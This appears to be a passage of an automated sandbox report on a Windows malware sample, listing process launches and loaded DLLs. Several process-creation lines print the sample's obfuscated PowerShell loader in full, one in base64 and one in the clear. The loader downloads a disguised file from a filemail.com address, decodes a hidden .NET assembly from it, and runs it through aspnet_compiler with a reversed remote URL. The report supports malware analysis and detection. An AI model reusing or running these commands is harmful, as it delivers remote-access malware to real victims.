AgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA57E.tmp" "c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeProcess created: C:\Windows\SysWOW64\cleanmgr.exe "C:\Windows\SysWOW64\cleanmgr.exe"
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
